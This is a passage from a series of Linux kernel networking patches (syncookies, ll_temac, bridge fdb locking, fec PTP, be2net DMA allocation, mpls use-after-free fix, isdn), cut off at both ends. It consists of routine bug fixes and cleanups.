b/net/ipv6/syncookies.c index 21bc2eb53c57..0909f4e0d53c 100644 --- a/net/ipv6/syncookies.c +++ b/net/ipv6/syncookies.c @@ -41,23 +41,6 @@ static __u16 const msstab[] = { 9000 - 60, }; -static inline struct sock *get_cookie_sock(struct sock *sk, struct sk_buff *skb, - struct request_sock *req, - struct dst_entry *dst) -{ - struct inet_connection_sock *icsk = inet_csk(sk); - struct sock *child; - - child = icsk->icsk_af_ops->syn_recv_sock(sk, skb, req, dst); - if (child) { - atomic_set(&req->rsk_refcnt, 1); - inet_csk_reqsk_queue_add(sk, req, child); - } else { - reqsk_free(req); - } - return child; -} - static DEFINE_PER_CPU(__u32 [16 + 5 + SHA_WORKSPACE_WORDS], ipv6_cookie_scratch); @@ -264,7 +247,7 @@ struct sock *cookie_v6_check(struct sock *sk, struct sk_buff *skb) ireq->rcv_wscale = rcv_wscale; ireq->ecn_ok = cookie_ecn_ok(&tcp_opt, sock_net(sk), dst); - ret = get_cookie_sock(sk, skb, req, dst); + ret = tcp_get_cookie_sock(sk, skb, req, dst); out: return ret; out_free: From 84ea0ded3462c6a75f2f9ff898fa736dcab2d737 Mon Sep 17 00:00:00 2001 From: Michal Simek Date: Fri, 5 Jun 2015 10:49:17 +0200 Subject: [PATCH 754/872] net: ll_temac: Remove sparse warnings Remove sparse warnings: drivers/net/ethernet/xilinx/ll_temac_main.c:65:16: warning: cast removes address space of expression drivers/net/ethernet/xilinx/ll_temac_main.c:70:9: warning: cast removes address space of expression drivers/net/ethernet/xilinx/ll_temac_main.c:127:16: warning: cast removes address space of expression drivers/net/ethernet/xilinx/ll_temac_main.c:137:9: warning: cast removes address space of expression drivers/net/ethernet/xilinx/ll_temac_main.c:409:3: warning: symbol 'temac_options' was not declared. Should it be static? drivers/net/ethernet/xilinx/ll_temac_main.c:590:6: warning: symbol 'temac_adjust_link' was not declared. Should it be static? Signed-off-by: Michal Simek Signed-off-by: David S. Miller --- drivers/net/ethernet/xilinx/ll_temac_main.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/drivers/net/ethernet/xilinx/ll_temac_main.c b/drivers/net/ethernet/xilinx/ll_temac_main.c index 3b99a4df71f8..5a1068df7038 100644 --- a/drivers/net/ethernet/xilinx/ll_temac_main.c +++ b/drivers/net/ethernet/xilinx/ll_temac_main.c @@ -62,12 +62,12 @@ u32 temac_ior(struct temac_local *lp, int offset) { - return in_be32((u32 *)(lp->regs + offset)); + return in_be32(lp->regs + offset); } void temac_iow(struct temac_local *lp, int offset, u32 value) { - out_be32((u32 *) (lp->regs + offset), value); + out_be32(lp->regs + offset, value); } int temac_indirect_busywait(struct temac_local *lp) @@ -124,7 +124,7 @@ void temac_indirect_out32(struct temac_local *lp, int reg, u32 value) */ static u32 temac_dma_in32(struct temac_local *lp, int reg) { - return in_be32((u32 *)(lp->sdma_regs + (reg << 2))); + return in_be32(lp->sdma_regs + (reg << 2)); } /** @@ -134,7 +134,7 @@ static u32 temac_dma_in32(struct temac_local *lp, int reg) */ static void temac_dma_out32(struct temac_local *lp, int reg, u32 value) { - out_be32((u32 *)(lp->sdma_regs + (reg << 2)), value); + out_be32(lp->sdma_regs + (reg << 2), value); } /* DMA register access functions can be DCR based or memory mapped. @@ -400,7 +400,7 @@ static void temac_set_multicast_list(struct net_device *ndev) mutex_unlock(&lp->indirect_mutex); } -struct temac_option { +static struct temac_option { int flg; u32 opt; u32 reg; @@ -587,7 +587,7 @@ static void temac_device_reset(struct net_device *ndev) ndev->trans_start = jiffies; /* prevent tx timeout */ } -void temac_adjust_link(struct net_device *ndev) +static void temac_adjust_link(struct net_device *ndev) { struct temac_local *lp = netdev_priv(ndev); struct phy_device *phy = lp->phy_dev; From 1d7c49037b12016e7056b9f2c990380e2187e766 Mon Sep 17 00:00:00 2001 From: Wilson Kok Date: Fri, 5 Jun 2015 00:52:57 -0700 Subject: [PATCH 755/872] bridge: use _bh spinlock variant for br_fdb_update to avoid lockup br_fdb_update() can be called in process context in the following way: br_fdb_add() -> __br_fdb_add() -> br_fdb_update() (if NTF_USE flag is set) so we need to use spin_lock_bh because there are softirq users of the hash_lock. One easy way to reproduce this is to modify the bridge utility to set NTF_USE, enable stp and then set maxageing to a low value so br_fdb_cleanup() is called frequently and then just add new entries in a loop. This happens because br_fdb_cleanup() is called from timer/softirq context. These locks were _bh before commit f8ae737deea1 ("[BRIDGE]: forwarding remove unneeded preempt and bh diasables") and at the time that commit was correct because br_fdb_update() couldn't be called from process context, but that changed after commit: 292d1398983f ("bridge: add NTF_USE support") Signed-off-by: Wilson Kok Signed-off-by: Nikolay Aleksandrov Fixes: 292d1398983f ("bridge: add NTF_USE support") Signed-off-by: David S. Miller --- net/bridge/br_fdb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c index e0670d7054f9..7eacc8ae9779 100644 --- a/net/bridge/br_fdb.c +++ b/net/bridge/br_fdb.c @@ -569,7 +569,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, fdb_notify(br, fdb, RTM_NEWNEIGH); } } else { - spin_lock(&br->hash_lock); + spin_lock_bh(&br->hash_lock); if (likely(!fdb_find(head, addr, vid))) { fdb = fdb_create(head, source, addr, vid); if (fdb) { @@ -581,7 +581,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, /* else we lose race and someone else inserts * it first, don't bother updating */ - spin_unlock(&br->hash_lock); + spin_unlock_bh(&br->hash_lock); } } From 34270f5f6f1bcc2dc9d2e5aa28147667425cc424 Mon Sep 17 00:00:00 2001 From: Fugang Duan Date: Fri, 5 Jun 2015 17:22:08 +0800 Subject: [PATCH 756/872] net: fec: ptp: correct the ENET_ATCOR value The current driver adjust freq formula is: fe * diff = ppb * pc Note: fe: ENET ref clock frequency in Hz diff = inc_corr - inc: difference between default increment and correction increment ppb: parts per billion adjustment from base pc: correction period (in number of fe clock cycles) The correction increment will be used after N cycles of regular increments, not every N cycles (with N being the correction period). For example, set ENET_ATCOR=4, INC=8, INC_CORR=9, there will be 4 increments of 8 (ENET_ATINC[INC]) , followed by 1 increment of 9 (ENET_ATINC[INC_CORR]). So, the correct formula is: fe * diff = ppb * (pc + 1) For ENET_ATCOR, a value 0 disables the correction counter and no corrections occur. So base on the origin formula, set pc = pc > 1 ? pc - 1 : pc. Signed-off-by: Fugang Duan Signed-off-by: Frank Li Signed-off-by: David S. Miller --- drivers/net/ethernet/freescale/fec_ptp.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/ethernet/freescale/fec_ptp.c b/drivers/net/ethernet/freescale/fec_ptp.c index a583d89b13c4..a15663ad7f5e 100644 --- a/drivers/net/ethernet/freescale/fec_ptp.c +++ b/drivers/net/ethernet/freescale/fec_ptp.c @@ -353,6 +353,7 @@ static int fec_ptp_adjfreq(struct ptp_clock_info *ptp, s32 ppb) tmp = readl(fep->hwp + FEC_ATIME_INC) & FEC_T_INC_MASK; tmp |= corr_ns << FEC_T_INC_CORR_OFFSET; writel(tmp, fep->hwp + FEC_ATIME_INC); + corr_period = corr_period > 1 ? corr_period - 1 : corr_period; writel(corr_period, fep->hwp + FEC_ATIME_CORR); /* dummy read to update the timer. */ timecounter_read(&fep->tc); From e51000db4c880165eab06ec0990605f24e75203f Mon Sep 17 00:00:00 2001 From: Sriharsha Basavapatna Date: Fri, 5 Jun 2015 15:33:59 +0530 Subject: [PATCH 757/872] be2net: Replace dma/pci_alloc_coherent() calls with dma_zalloc_coherent() There are several places in the driver (all in control paths) where coherent dma memory is being allocated using either dma_alloc_coherent() or the deprecated pci_alloc_consistent(). All these calls should be changed to use dma_zalloc_coherent() to avoid uninitialized fields in data structures backed by this memory. Reported-by: Joerg Roedel Tested-by: Joerg Roedel Signed-off-by: Sriharsha Basavapatna Signed-off-by: David S. Miller --- drivers/net/ethernet/emulex/benet/be_cmds.c | 87 +++++++++++-------- .../net/ethernet/emulex/benet/be_ethtool.c | 18 ++-- drivers/net/ethernet/emulex/benet/be_main.c | 15 ++-- 3 files changed, 67 insertions(+), 53 deletions(-) diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c b/drivers/net/ethernet/emulex/benet/be_cmds.c index fb140faeafb1..c5e1d0ac75f9 100644 --- a/drivers/net/ethernet/emulex/benet/be_cmds.c +++ b/drivers/net/ethernet/emulex/benet/be_cmds.c @@ -1720,9 +1720,9 @@ int be_cmd_get_regs(struct be_adapter *adapter, u32 buf_len, void *buf) total_size = buf_len; get_fat_cmd.size = sizeof(struct be_cmd_req_get_fat) + 60*1024; - get_fat_cmd.va = pci_alloc_consistent(adapter->pdev, - get_fat_cmd.size, - &get_fat_cmd.dma); + get_fat_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + get_fat_cmd.size, + &get_fat_cmd.dma, GFP_ATOMIC); if (!get_fat_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure while reading FAT data\n"); @@ -1767,8 +1767,8 @@ int be_cmd_get_regs(struct be_adapter *adapter, u32 buf_len, void *buf) log_offset += buf_size; } err: - pci_free_consistent(adapter->pdev, get_fat_cmd.size, - get_fat_cmd.va, get_fat_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, get_fat_cmd.size, + get_fat_cmd.va, get_fat_cmd.dma); spin_unlock_bh(&adapter->mcc_lock); return status; } @@ -2215,12 +2215,12 @@ int be_cmd_read_port_transceiver_data(struct be_adapter *adapter, return -EINVAL; cmd.size = sizeof(struct be_cmd_resp_port_type); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failed\n"); return -ENOMEM; } - memset(cmd.va, 0, cmd.size); spin_lock_bh(&adapter->mcc_lock); @@ -2245,7 +2245,7 @@ int be_cmd_read_port_transceiver_data(struct be_adapter *adapter, } err: spin_unlock_bh(&adapter->mcc_lock); - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, cmd.dma); return status; } @@ -2720,7 +2720,8 @@ int be_cmd_get_phy_info(struct be_adapter *adapter) goto err; } cmd.size = sizeof(struct be_cmd_req_get_phy_info); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); status = -ENOMEM; @@ -2754,7 +2755,7 @@ int be_cmd_get_phy_info(struct be_adapter *adapter) BE_SUPPORTED_SPEED_1GBPS; } } - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, cmd.dma); err: spin_unlock_bh(&adapter->mcc_lock); return status; @@ -2805,8 +2806,9 @@ int be_cmd_get_cntl_attributes(struct be_adapter *adapter) memset(&attribs_cmd, 0, sizeof(struct be_dma_mem)); attribs_cmd.size = sizeof(struct be_cmd_resp_cntl_attribs); - attribs_cmd.va = pci_alloc_consistent(adapter->pdev, attribs_cmd.size, - &attribs_cmd.dma); + attribs_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + attribs_cmd.size, + &attribs_cmd.dma, GFP_ATOMIC); if (!attribs_cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); status = -ENOMEM; @@ -2833,8 +2835,8 @@ int be_cmd_get_cntl_attributes(struct be_adapter *adapter) err: mutex_unlock(&adapter->mbox_lock); if (attribs_cmd.va) - pci_free_consistent(adapter->pdev, attribs_cmd.size, - attribs_cmd.va, attribs_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, attribs_cmd.size, + attribs_cmd.va, attribs_cmd.dma); return status; } @@ -2972,9 +2974,10 @@ int be_cmd_get_mac_from_list(struct be_adapter *adapter, u8 *mac, memset(&get_mac_list_cmd, 0, sizeof(struct be_dma_mem)); get_mac_list_cmd.size = sizeof(struct be_cmd_resp_get_mac_list); - get_mac_list_cmd.va = pci_alloc_consistent(adapter->pdev, - get_mac_list_cmd.size, - &get_mac_list_cmd.dma); + get_mac_list_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + get_mac_list_cmd.size, + &get_mac_list_cmd.dma, + GFP_ATOMIC); if (!get_mac_list_cmd.va) { dev_err(&adapter->pdev->dev, @@ -3047,8 +3050,8 @@ int be_cmd_get_mac_from_list(struct be_adapter *adapter, u8 *mac, out: spin_unlock_bh(&adapter->mcc_lock); - pci_free_consistent(adapter->pdev, get_mac_list_cmd.size, - get_mac_list_cmd.va, get_mac_list_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, get_mac_list_cmd.size, + get_mac_list_cmd.va, get_mac_list_cmd.dma); return status; } @@ -3101,8 +3104,8 @@ int be_cmd_set_mac_list(struct be_adapter *adapter, u8 *mac_array, memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_req_set_mac_list); - cmd.va = dma_alloc_coherent(&adapter->pdev->dev, cmd.size, - &cmd.dma, GFP_KERNEL); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_KERNEL); if (!cmd.va) return -ENOMEM; @@ -3291,7 +3294,8 @@ int be_cmd_get_acpi_wol_cap(struct be_adapter *adapter) memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_resp_acpi_wol_magic_config_v1); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory allocation failure\n"); status = -ENOMEM; @@ -3326,7 +3330,8 @@ int be_cmd_get_acpi_wol_cap(struct be_adapter *adapter) err: mutex_unlock(&adapter->mbox_lock); if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } @@ -3340,8 +3345,9 @@ int be_cmd_set_fw_log_level(struct be_adapter *adapter, u32 level) memset(&extfat_cmd, 0, sizeof(struct be_dma_mem)); extfat_cmd.size = sizeof(struct be_cmd_resp_get_ext_fat_caps); - extfat_cmd.va = pci_alloc_consistent(adapter->pdev, extfat_cmd.size, - &extfat_cmd.dma); + extfat_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + extfat_cmd.size, &extfat_cmd.dma, + GFP_ATOMIC); if (!extfat_cmd.va) return -ENOMEM; @@ -3363,8 +3369,8 @@ int be_cmd_set_fw_log_level(struct be_adapter *adapter, u32 level) status = be_cmd_set_ext_fat_capabilites(adapter, &extfat_cmd, cfgs); err: - pci_free_consistent(adapter->pdev, extfat_cmd.size, extfat_cmd.va, - extfat_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, extfat_cmd.size, extfat_cmd.va, + extfat_cmd.dma); return status; } @@ -3377,8 +3383,9 @@ int be_cmd_get_fw_log_level(struct be_adapter *adapter) memset(&extfat_cmd, 0, sizeof(struct be_dma_mem)); extfat_cmd.size = sizeof(struct be_cmd_resp_get_ext_fat_caps); - extfat_cmd.va = pci_alloc_consistent(adapter->pdev, extfat_cmd.size, - &extfat_cmd.dma); + extfat_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + extfat_cmd.size, &extfat_cmd.dma, + GFP_ATOMIC); if (!extfat_cmd.va) { dev_err(&adapter->pdev->dev, "%s: Memory allocation failure\n", @@ -3396,8 +3403,8 @@ int be_cmd_get_fw_log_level(struct be_adapter *adapter) level = cfgs->module[0].trace_lvl[j].dbg_lvl; } } - pci_free_consistent(adapter->pdev, extfat_cmd.size, extfat_cmd.va, - extfat_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, extfat_cmd.size, extfat_cmd.va, + extfat_cmd.dma); err: return level; } @@ -3595,7 +3602,8 @@ int be_cmd_get_func_config(struct be_adapter *adapter, struct be_resources *res) memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_resp_get_func_config); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) { dev_err(&adapter->pdev->dev, "Memory alloc failure\n"); status = -ENOMEM; @@ -3635,7 +3643,8 @@ int be_cmd_get_func_config(struct be_adapter *adapter, struct be_resources *res) err: mutex_unlock(&adapter->mbox_lock); if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } @@ -3656,7 +3665,8 @@ int be_cmd_get_profile_config(struct be_adapter *adapter, memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_resp_get_profile_config); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) return -ENOMEM; @@ -3702,7 +3712,8 @@ int be_cmd_get_profile_config(struct be_adapter *adapter, res->vf_if_cap_flags = vf_res->cap_flags; err: if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } @@ -3717,7 +3728,8 @@ static int be_cmd_set_profile_config(struct be_adapter *adapter, void *desc, memset(&cmd, 0, sizeof(struct be_dma_mem)); cmd.size = sizeof(struct be_cmd_req_set_profile_config); - cmd.va = pci_alloc_consistent(adapter->pdev, cmd.size, &cmd.dma); + cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, cmd.size, &cmd.dma, + GFP_ATOMIC); if (!cmd.va) return -ENOMEM; @@ -3733,7 +3745,8 @@ static int be_cmd_set_profile_config(struct be_adapter *adapter, void *desc, status = be_cmd_notify_wait(adapter, &wrb); if (cmd.va) - pci_free_consistent(adapter->pdev, cmd.size, cmd.va, cmd.dma); + dma_free_coherent(&adapter->pdev->dev, cmd.size, cmd.va, + cmd.dma); return status; } diff --git a/drivers/net/ethernet/emulex/benet/be_ethtool.c b/drivers/net/ethernet/emulex/benet/be_ethtool.c index b765c24625bf..2835dee5dc39 100644 --- a/drivers/net/ethernet/emulex/benet/be_ethtool.c +++ b/drivers/net/ethernet/emulex/benet/be_ethtool.c @@ -264,8 +264,8 @@ static int lancer_cmd_read_file(struct be_adapter *adapter, u8 *file_name, int status = 0; read_cmd.size = LANCER_READ_FILE_CHUNK; - read_cmd.va = pci_alloc_consistent(adapter->pdev, read_cmd.size, - &read_cmd.dma); + read_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, read_cmd.size, + &read_cmd.dma, GFP_ATOMIC); if (!read_cmd.va) { dev_err(&adapter->pdev->dev, @@ -289,8 +289,8 @@ static int lancer_cmd_read_file(struct be_adapter *adapter, u8 *file_name, break; } } - pci_free_consistent(adapter->pdev, read_cmd.size, read_cmd.va, - read_cmd.dma); + dma_free_coherent(&adapter->pdev->dev, read_cmd.size, read_cmd.va, + read_cmd.dma); return status; } @@ -818,8 +818,9 @@ static int be_test_ddr_dma(struct be_adapter *adapter) }; ddrdma_cmd.size = sizeof(struct be_cmd_req_ddrdma_test); - ddrdma_cmd.va = dma_alloc_coherent(&adapter->pdev->dev, ddrdma_cmd.size, - &ddrdma_cmd.dma, GFP_KERNEL); + ddrdma_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + ddrdma_cmd.size, &ddrdma_cmd.dma, + GFP_KERNEL); if (!ddrdma_cmd.va) return -ENOMEM; @@ -941,8 +942,9 @@ static int be_read_eeprom(struct net_device *netdev, memset(&eeprom_cmd, 0, sizeof(struct be_dma_mem)); eeprom_cmd.size = sizeof(struct be_cmd_req_seeprom_read); - eeprom_cmd.va = dma_alloc_coherent(&adapter->pdev->dev, eeprom_cmd.size, - &eeprom_cmd.dma, GFP_KERNEL); + eeprom_cmd.va = dma_zalloc_coherent(&adapter->pdev->dev, + eeprom_cmd.size, &eeprom_cmd.dma, + GFP_KERNEL); if (!eeprom_cmd.va) return -ENOMEM; diff --git a/drivers/net/ethernet/emulex/benet/be_main.c b/drivers/net/ethernet/emulex/benet/be_main.c index 6f9ffb9026cd..e43cc8a73ea7 100644 --- a/drivers/net/ethernet/emulex/benet/be_main.c +++ b/drivers/net/ethernet/emulex/benet/be_main.c @@ -4605,8 +4605,8 @@ static int lancer_fw_download(struct be_adapter *adapter, flash_cmd.size = sizeof(struct lancer_cmd_req_write_object) + LANCER_FW_DOWNLOAD_CHUNK; - flash_cmd.va = dma_alloc_coherent(dev, flash_cmd.size, - &flash_cmd.dma, GFP_KERNEL); + flash_cmd.va = dma_zalloc_coherent(dev, flash_cmd.size, + &flash_cmd.dma, GFP_KERNEL); if (!flash_cmd.va) return -ENOMEM; @@ -4739,8 +4739,8 @@ static int be_fw_download(struct be_adapter *adapter, const struct firmware* fw) } flash_cmd.size = sizeof(struct be_cmd_write_flashrom); - flash_cmd.va = dma_alloc_coherent(dev, flash_cmd.size, &flash_cmd.dma, - GFP_KERNEL); + flash_cmd.va = dma_zalloc_coherent(dev, flash_cmd.size, &flash_cmd.dma, + GFP_KERNEL); if (!flash_cmd.va) return -ENOMEM; @@ -5291,16 +5291,15 @@ static int be_drv_init(struct be_adapter *adapter) int status = 0; mbox_mem_alloc->size = sizeof(struct be_mcc_mailbox) + 16; - mbox_mem_alloc->va = dma_alloc_coherent(dev, mbox_mem_alloc->size, - &mbox_mem_alloc->dma, - GFP_KERNEL); + mbox_mem_alloc->va = dma_zalloc_coherent(dev, mbox_mem_alloc->size, + &mbox_mem_alloc->dma, + GFP_KERNEL); if (!mbox_mem_alloc->va) return -ENOMEM; mbox_mem_align->size = sizeof(struct be_mcc_mailbox); mbox_mem_align->va = PTR_ALIGN(mbox_mem_alloc->va, 16); mbox_mem_align->dma = PTR_ALIGN(mbox_mem_alloc->dma, 16); - memset(mbox_mem_align->va, 0, sizeof(struct be_mcc_mailbox)); rx_filter->size = sizeof(struct be_cmd_req_rx_filter); rx_filter->va = dma_zalloc_coherent(dev, rx_filter->size, From addae62e73cc7c2b0277d5069649be5594f0a5c8 Mon Sep 17 00:00:00 2001 From: Antonio Murdaca Date: Fri, 5 Jun 2015 18:58:38 +0200 Subject: [PATCH 758/872] ethernet: micrel: use time_is_before_eq_jiffies use time_is_before_eq_jiffies macro for time comparison Signed-off-by: Antonio Murdaca Signed-off-by: David S. Miller --- drivers/net/ethernet/micrel/ksz884x.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/micrel/ksz884x.c b/drivers/net/ethernet/micrel/ksz884x.c index 48d2aecb0da9..75dc46c5fca2 100644 --- a/drivers/net/ethernet/micrel/ksz884x.c +++ b/drivers/net/ethernet/micrel/ksz884x.c @@ -6689,7 +6689,7 @@ static void mib_monitor(unsigned long ptr) /* This is used to verify Wake-on-LAN is working. */ if (hw_priv->pme_wait) { - if (hw_priv->pme_wait <= jiffies) { + if (time_is_before_eq_jiffies(hw_priv->pme_wait)) { hw_clr_wol_pme_status(&hw_priv->hw); hw_priv->pme_wait = 0; } From 25cc8f0763c972911b1a65099cd10d9f8a45a7b0 Mon Sep 17 00:00:00 2001 From: Robert Shearman Date: Fri, 5 Jun 2015 18:54:45 +0100 Subject: [PATCH 759/872] mpls: fix possible use after free of device The mpls device is used in an RCU read context without a lock being held. As the memory is freed without waiting for the RCU grace period to elapse, the freed memory could still be in use. Address this by using kfree_rcu to free the memory for the mpls device after the RCU grace period has elapsed. Fixes: 03c57747a702 ("mpls: Per-device MPLS state") Signed-off-by: Robert Shearman Acked-by: "Eric W. Biederman" Signed-off-by: David S. Miller --- net/mpls/af_mpls.c | 2 +- net/mpls/internal.h | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/net/mpls/af_mpls.c b/net/mpls/af_mpls.c index 7b3f732269e4..bff427f31924 100644 --- a/net/mpls/af_mpls.c +++ b/net/mpls/af_mpls.c @@ -541,7 +541,7 @@ static void mpls_ifdown(struct net_device *dev) RCU_INIT_POINTER(dev->mpls_ptr, NULL); - kfree(mdev); + kfree_rcu(mdev, rcu); } static int mpls_dev_notify(struct notifier_block *this, unsigned long event, diff --git a/net/mpls/internal.h b/net/mpls/internal.h index b064c345042c..8cabeb5a1cb9 100644 --- a/net/mpls/internal.h +++ b/net/mpls/internal.h @@ -16,6 +16,7 @@ struct mpls_dev { int input_enabled; struct ctl_table_header *sysctl; + struct rcu_head rcu; }; struct sk_buff; From 4e2987a188c56d269882d89d37b6128f71d3b2a0 Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Sat, 6 Jun 2015 06:44:00 +0530 Subject: [PATCH 760/872] isdn/hisax: Convert use of __constant_cpu_to_le16 to cpu_to_le16 In big endian cases, macro cpu_to_le16 unfolds to __swab16 which provides special case for constants. In little endian cases, __constant_cpu_to_le16 and cpu_to_le16 expand directly to the same expression. So, replace __constant_cpu_to_le16 with cpu_to_le16 with the goal of getting rid of the definition of __constant_cpu_to_le16 completely. The semantic patch that performs this transformation is as follows: @@expression x;@@ - __constant_cpu_to_le16(x) + cpu_to_le16(x) Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/isdn/hisax/st5481_usb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/isdn/hisax/st5481_usb.c b/drivers/isdn/hisax/st5481_usb.c index ead0a4fb7448..a0fdbc074b98 100644 --- a/drivers/isdn/hisax/st5481_usb.c +++ b/drivers/isdn/hisax/st5481_usb.c @@ -267,8 +267,8 @@ int st5481_setup_usb(struct st5481_adapter *adapter) } // The descriptor is wrong for some early samples of the ST5481 chip - altsetting->endpoint[3].desc.wMaxPacketSize = __constant_cpu_to_le16(32); - altsetting->endpoint[4].desc.wMaxPacketSize = __constant_cpu_to_le16(32); + altsetting->endpoint[3].desc.wMaxPacketSize = cpu_to_le16(32); + altsetting->endpoint[4].desc.wMaxPacketSize = cpu_to_le16(32); // Use alternative setting 3 on interface 0 to have 2B+D if ((status = usb_set_interface(dev, 0, 3)) < 0) { From 7ff46e79fb7df5b09c46c36857929fdf039f8b31 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Sun, 7 Jun 2015 19:43:47 -0700 Subject: [PATCH 761/872] Revert "bridge: use _bh spinlock variant for br_fdb_update to avoid lockup" This reverts commit 1d7c49037b12016e7056b9f2c990380e2187e766. Nikolay Aleksandrov has a better version of this fix. Signed-off-by: David S. Miller --- net/bridge/br_fdb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c index 7eacc8ae9779..e0670d7054f9 100644 --- a/net/bridge/br_fdb.c +++ b/net/bridge/br_fdb.c @@ -569,7 +569,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, fdb_notify(br, fdb, RTM_NEWNEIGH); } } else { - spin_lock_bh(&br->hash_lock); + spin_lock(&br->hash_lock); if (likely(!fdb_find(head, addr, vid))) { fdb = fdb_create(head, source, addr, vid); if (fdb) { @@ -581,7 +581,7 @@ void br_fdb_update(struct net_bridge *br, struct net_bridge_port *source, /* else we lose race and someone else inserts * it first, don't bother updating */ - spin_unlock_bh(&br->hash_lock); + spin_unlock(&br->hash_lock); } } From c4c832f89dc468cf11dc0dd17206bace44526651 Mon Sep 17 00:00:00 2001 From: Nikolay Aleksandrov Date: Sat, 6 Jun 2015 06:49:00 -0700 Subject: [PATCH 762/872] bridge: disable softirqs around br_fdb_update to avoid lockup br_fdb_update() can be called in process context in the following way: br_fdb_add() -> __br_fdb_add() -> br_fdb_update() (if NTF_USE flag is set) so we need to disable softirqs because there are softirq users of the hash_lock. One easy way to reproduce this is to modify the bridge utility to set NTF_USE, enable stp and then set maxageing to a low value so br_fdb_cleanup() is called frequently and then just add new entries in a loop. This happens because br_fdb_cleanup() is called from timer/softirq context. The spin locks in br_fdb_update were _bh before commit f8ae737deea1 ("[BRIDGE]: forwarding remove unneeded preempt and bh diasables") and at the time that commit was correct because br_fdb_update() couldn't be called from process context, but that changed after commit: 292d1398983f ("bridge: add NTF_USE support") Using local_bh_disable/enable around br_fdb_update() allows us to keep using the spin_lock/unlock in br_fdb_update for the fast-path. Signed-off-by: Nikolay Aleksandrov Fixes: 292d1398983f ("bridge: add NTF_USE support") Signed-off-by: David S. Miller --- net/bridge/br_fdb.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c index e0670d7054f9..659fb96672e4 100644 --- a/net/bridge/br_fdb.c +++ b/net/bridge/br_fdb.c @@ -796,9 +796,11 @@ static int __br_fdb_add(struct ndmsg *ndm, struct net_bridge_port *p, int err = 0; if (ndm->ndm_flags & NTF_USE) { + local_bh_disable(); rcu_read_lock(); br_fdb_update(p->br, p, addr, vid, true); rcu_read_unlock(); + local_bh_enable(); } else { spin_lock_bh(&p->br->hash_lock); err = fdb_add_entry(p, addr, ndm->ndm_state, From 1489bdeeae1a47171926e255956c9fc251db13a0 Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Sun, 7 Jun 2015 14:11:48 +0200 Subject: [PATCH 763/872] b44: call netif_napi_del() When the driver gets unregistered a call to netif_napi_del() was missing, this all 